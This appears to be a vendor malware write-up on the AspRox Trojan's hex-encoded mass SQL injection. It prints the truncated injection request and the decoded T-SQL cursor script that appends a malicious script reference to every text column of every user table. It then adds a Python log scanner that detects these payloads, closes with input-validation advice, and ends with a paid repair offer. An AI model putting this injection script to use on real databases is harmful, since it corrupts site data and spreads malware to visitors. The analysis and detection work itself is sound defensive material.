Binary Encoded Mass SQL Injection Attack
When the AspRox virus/Trojan first appeared it took the form of a phishing Trojan, but a recent update pushed to infected computers revealed an entirely new make-up for this online malbot. The bot has been transformed into an unusual form of attackware that is rapidly infecting websites and their users.
Once it is installed on a user's machine, the Trojan starts sending HTTP GET requests to vulnerable websites written in ASP, using a backdoor on the user's machine to do so. These malicious requests carry an ASCII T-SQL script encoded as a hexadecimal binary literal, similar to the one shown below (string reduced):
;DECLARE @S VARCHAR(4000); SET%20@S=CAST(0x4445434C41524520405420564152434... AS VARCHAR(4000)); EXEC(@S);--
The script connects to the website's database and opens a cursor over the system tables to enumerate every text column of every user-defined table. For each column found it appends its own value (in this case a reference to a JavaScript file) to the column's current contents and updates the database.
Decoding the injection reveals the hidden T-SQL script (subject to variation):
DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* NVARCHAR */ OR
[B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] =
RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''''') /* the appended <script> literal is reduced out here */
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
The result for affected sites is the inclusion of the malicious JavaScript file in every field described above, so any data retrieved onto the website's pages causes the file to run on the visitor's machine. When the JavaScript file runs, a tiny iframe is created which then attempts to download malicious software from another host website using up to 9 different browser exploits. Thus the whole cycle starts again, continuing the spread of infection. It has been noted that this particular Trojan can be quite difficult to protect websites against; we have heard many reports of 'well coded' sites suffering from it.
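Added example, not from the original write-up: a small Python scanner that pulls the hex literal out of a CAST(0x... AS VARCHAR) request, decodes it and flags the sysobjects/syscolumns cursor signature shown above. It also handles the NVARCHAR (UTF-16LE) form, which goes beyond what the page shows; the sample log lines, the script fragment and the two-signature threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Hex literal handed to CAST(0x... AS [N]VARCHAR(n)); the declared type tells us
# how to decode the bytes (NVARCHAR = UTF-16LE, VARCHAR = single-byte ASCII).
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)

# Fragments of the decoded cursor script above; two or more together count as a hit.
SIGNATURE = ("sysobjects", "syscolumns", "@@FETCH_STATUS", "EXEC(", "UPDATE [")


def decode_payloads(request: str) -> list[str]:
    """Return every T-SQL script hidden in CAST(0x...) literals of one request/log line."""
    scripts = []
    for hexdata, sqltype in CAST_RE.findall(unquote(request)):  # undo %20 etc. first
        try:
            raw = bytes.fromhex(hexdata)
        except ValueError:  # odd-length or otherwise malformed literal
            continue
        enc = "utf-16-le" if sqltype.upper() == "NVARCHAR" else "latin-1"
        scripts.append(raw.decode(enc, errors="replace"))
    return scripts


def is_cursor_injection(script: str) -> bool:
    """True when the decoded text carries the hallmarks of the AspRox cursor script."""
    lowered = script.lower()
    return sum(sig.lower() in lowered for sig in SIGNATURE) >= 2


def scan_log(lines) -> list[tuple[int, str]]:
    """Return (line_no, decoded_script) for each log line carrying an injected cursor script."""
    hits = []
    for n, line in enumerate(lines, 1):
        hits.extend((n, s) for s in decode_payloads(line) if is_cursor_injection(s))
    return hits


# Constructed sample (not a real capture): a harmless request followed by one that
# carries a hex-encoded cursor script, in the shape of an IIS-style log line.
SAMPLE_SCRIPT = ("DECLARE @T VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
                 "SELECT a.name,b.name FROM sysobjects a,syscolumns b ...")
SAMPLE_HEX = SAMPLE_SCRIPT.encode("ascii").hex().upper()
SAMPLE_LOG = [
    "2008-06-25 10:00:01 GET /news.asp id=12 200",
    "2008-06-25 10:00:02 GET /news.asp id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
]

if __name__ == "__main__":
    for line_no, script in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {script}")
```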
Write Up By: Baz {FireStorm}
Website Owners
It is imperative that all querystring and form data is validated rigorously and fully sanitised before being used in any query against the database. All session objects should be subject to the same checks. Simply checking 'Server Variables' is not acceptable protection, as these can be spoofed. Restricting database rights is important on high-use front-end web applications: only allow what is absolutely essential.
What Can I Do?
We can offer you a specially designed package to protect your website against attacks by this notoriously difficult-to-clean Trojan. Our package can usually be installed onto your website and database very quickly, offering almost instant protection. We can also repair and rebuild your corrupted database and have you back up and running in no time at all. Contact us now for a highly competitive quote. Website solutions to the AspRox Trojan start from £49.99.